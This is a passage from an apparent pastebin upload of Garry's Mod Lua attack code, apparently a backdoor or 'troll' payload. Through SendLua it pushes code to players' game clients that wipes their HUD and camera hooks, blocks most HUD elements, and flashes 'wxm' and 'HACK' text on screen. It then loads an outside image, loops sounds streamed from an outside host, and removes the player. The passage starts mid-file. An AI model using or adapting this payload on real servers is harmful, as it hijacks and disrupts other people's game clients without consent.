  899. "DermaLarge",
  900. ScrW() /2 +math.random( -800, 800 ),
  901. ScrH() /2 +math.random( -800, 800 ) -400,
  902. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  903. TEXT_ALIGN_CENTER,
  904. TEXT_ALIGN_CENTER,
  905. 1,
  906. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  907. )
  908. end )
  909. ]] )
  910. end )
  911.  
  912. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  913. enigmalaunchproject:SendLua( pPlayer, [[
  914.  
  915. (GAMEMODE or GM).CalcView = function() end
  916. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  917.  
  918. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  919. for k, v in pairs(remove) do
  920. hook.GetTable()[v] = {}
  921. end
  922.  
  923. local function GetWebMat( strURL )
  924. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  925. end
  926.  
  927. hook.Add( "HUDPaint", "hud12enigma", function()
  928. surface.SetDrawColor( 255, 255, 255, 255 )
  929.  
  930. draw.SimpleTextOutlined(
  931. "wxm",
  932. "DermaLarge",
  933. ScrW() /2 +math.random( -850, 850 ),
  934. ScrH() /2 +math.random( -850, 850 ) +100,
  935. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  936. TEXT_ALIGN_CENTER,
  937. TEXT_ALIGN_CENTER,
  938. 1,
  939. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  940. )
  941. end )
  942. ]] )
  943. end )
  944.  
  945. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  946. enigmalaunchproject:SendLua( pPlayer, [[
  947.  
  948. (GAMEMODE or GM).CalcView = function() end
  949. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  950.  
  951. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  952. for k, v in pairs(remove) do
  953. hook.GetTable()[v] = {}
  954. end
  955.  
  956. local function GetWebMat( strURL )
  957. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  958. end
  959.  
  960. hook.Add( "HUDPaint", "hud1enigma", function()
  961. surface.SetDrawColor( 255, 255, 255, 255 )
  962.  
  963. draw.SimpleTextOutlined(
  964. "wxm",
  965. "DermaLarge",
  966. ScrW() /2 +math.random( -300, 600 ),
  967. ScrH() /2 +math.random( -600, 300 ) +200,
  968. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  969. TEXT_ALIGN_CENTER,
  970. TEXT_ALIGN_CENTER,
  971. 1,
  972. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  973. )
  974. end )
  975. ]] )
  976. end )
  977.  
  978. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  979. enigmalaunchproject:SendLua( pPlayer, [[
  980.  
  981. (GAMEMODE or GM).CalcView = function() end
  982. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  983.  
  984. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  985. for k, v in pairs(remove) do
  986. hook.GetTable()[v] = {}
  987. end
  988.  
  989. local function GetWebMat( strURL )
  990. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  991. end
  992.  
  993. hook.Add( "HUDPaint", "hud1enigma", function()
  994. surface.SetDrawColor( 255, 255, 255, 255 )
  995.  
  996. draw.SimpleTextOutlined(
  997. "wxm",
  998. "HACK",
  999. ScrW() /2 +math.random( -300, 600 ),
  1000. ScrH() /2 +math.random( -600, 300 ) +200,
  1001. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  1002. TEXT_ALIGN_CENTER,
  1003. TEXT_ALIGN_CENTER,
  1004. 1,
  1005. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  1006. )
  1007. end )
  1008. ]] )
  1009. end )
  1010.  
  1011.  
  1012. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  1013. enigmalaunchproject:SendLua( pPlayer, ([=[
  1014.  
  1015. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[ = {}
  1016. local html = [[%s]]
  1017. local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
  1018. local pnl = vgui.Create( "HTML" )
  1019. pnl:SetPos( ScrW() -1, ScrH() -1 )
  1020. pnl:SetVisible( true )
  1021. pnl:SetMouseInputEnabled( false )
  1022. pnl:SetKeyBoardInputEnabled( false )
  1023. pnl:SetSize( intSizeX, intSizeY )
  1024. pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
  1025.  
  1026. local PageLoaded
  1027. PageLoaded = function()
  1028. local mat = pnl:GetHTMLMaterial()
  1029. if mat then
  1030. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
  1031. return
  1032. end
  1033.  
  1034. timer.Simple( 0.5, PageLoaded )
  1035. end
  1036.  
  1037. PageLoaded()
  1038. end
  1039.  
  1040. LoadWebMaterial( "https://upload.wikimedia.org/wikipedia/commons/thumb/e/e3/Emmanuel_Macron_in_Tallinn_Digital_Summit._Welcome_dinner_hosted_by_HE_Donald_Tusk._Handshake_%2836669381364%29_%28cropped_2%29.jpg/220px-Emmanuel_Macron_in_Tallinn_Digital_Summit._Welcome_dinner_hosted_by_HE_Donald_Tusk._Handshake_%2836669381364%29_%28cropped_2%29.jpg", "EnigmaLogo", 1000, 1000 )
  1041. ]=]):format(lol.m_strImageLoadHTML) )
  1042. end )
  1043.  
  1044. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  1045. enigmalaunchproject:SendLua( pPlayer, [[
  1046. (GAMEMODE or GM).CalcView = function() end
  1047. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  1048.  
  1049. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  1050. for k, v in pairs(remove) do
  1051. hook.GetTable()[v] = {}
  1052. end
  1053.  
  1054. local function GetWebMat( strURL )
  1055. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  1056. end
  1057.  
  1058. hook.Add( "HUDPaint", "EnigmaLogoHUD", function()
  1059. surface.SetDrawColor( 255, 255, 255, 255 )
  1060.  
  1061. if GetWebMat( "EnigmaLogo" ) then
  1062. surface.SetMaterial( GetWebMat("EnigmaLogo")[1] )
  1063. surface.DrawTexturedRect( 0, ScrH() -128, 300 *(512 /300), 128 )
  1064. end
  1065. end )
  1066.  
  1067. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  1068. hook.Add( "HUDShouldDraw", "EnigmaLogoHUD", function( str ) if not allowed[str] then return false end end )
  1069.  
  1070. surface.PlaySound( "garrysmod/save_load4.wav" )
  1071. surface.PlaySound( "vo/npc/male01/excuseme02.wav" )
  1072. ]] )
  1073. end )
  1074.  
  1075. lol:PushAction( 175, function( pPlayer )
  1076. lol:SendLua( pPlayer, [[
  1077. surface.PlaySound( "vo/npc/male01/gethellout.wav" )
  1078.  
  1079. local sounds = {}
  1080. for i = 1, 4 do
  1081. sound.PlayURL( "http://marlowfr.alwaysdata.net/marlow.mp3", "noblock noplay", function( pChan )
  1082. sounds[#sounds +1] = pChan
  1083. end )
  1084. end
  1085.  
  1086. timer.Create( "asdf", 1, 0, function()
  1087. if #sounds ~= 4 then return end
  1088. timer.Destroy( "asdf" )
  1089. for k, v in pairs( sounds ) do v:EnableLooping( true ) v:SetVolume( 0 ) v:Play() end
  1090. end )
  1091.  
  1092. hook.Add( "HUDShouldDraw", "newhud", function() return false end )
  1093. ]] )
  1094.  
  1095. pPlayer:Remove()
  1096. end )
Advertisement
Add Comment
Please, Sign In to add comment